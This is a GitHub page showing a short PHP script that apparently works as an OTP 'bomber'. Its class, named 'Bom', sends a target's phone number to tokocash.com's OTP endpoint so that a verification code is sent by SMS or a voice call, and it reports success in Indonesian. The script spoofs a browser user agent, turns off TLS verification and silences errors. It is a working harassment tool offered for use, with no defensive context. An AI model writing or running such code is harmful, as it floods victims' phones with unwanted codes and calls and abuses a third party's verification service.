-
Notifications
You must be signed in to change notification settings - Fork 0
/
oeowowowowoowowowowowo9374u3
70 lines (53 loc) · 1.97 KB
/
oeowowowowoowowowowowo9374u3
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
<?php
error_reporting(0);
Class Bom {
public $no;
public $type;
public function sendC($url, $page, $params) {
$ch = curl_init();
curl_setopt ($ch, CURLOPT_URL, $url.$page);
curl_setopt ($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.8.1.6) Gecko/20070725 Firefox/2.0.0.6");
curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);
if(!empty($params)) {
curl_setopt ($ch, CURLOPT_POSTFIELDS, $params);
curl_setopt ($ch, CURLOPT_POST, 1);
}
curl_setopt ($ch, CURLOPT_SSL_VERIFYPEER, 0);
curl_setopt ($ch, CURLOPT_COOKIEJAR, 'cookie.txt');
curl_setopt ($ch, CURLOPT_COOKIEFILE, 'cookie.txt');
curl_setopt ($ch, CURLOPT_FOLLOWLOCATION, 1);
$headers = array();
$headers[] = 'Content-Type: application/x-www-form-urlencoded; charset=utf-8';
$headers[] = 'X-Requested-With: XMLHttpRequest';
curl_setopt ($ch, CURLOPT_HTTPHEADER, $headers);
//curl_setopt ($ch, CURLOPT_HEADER, 1);
$result = curl_exec ($ch);
curl_close($ch);
return $result;
}
private function getStr($start, $end, $string) {
if (!empty($string)) {
$setring = explode($start,$string);
$setring = explode($end,$setring[1]);
return $setring[0];
}
}
public function Verif()
{
$url = "https://www.tokocash.com/oauth/otp";
$no = $this->no;
$type = $this->type;
if ($type == 1) {
$data = "msisdn={$no}&accept=";
}elseif ($type == 2) {
$data = "msisdn={$no}&accept=call";
}
$send = $this->sendC($url, null, $data);
// echo $send;
if (preg_match('/otp_attempt_left/', $send)) {
print('OTP berhasil Dikirim!<br>');
} else {
print('OTP Gagal Dikirim!<br>');
}
}
}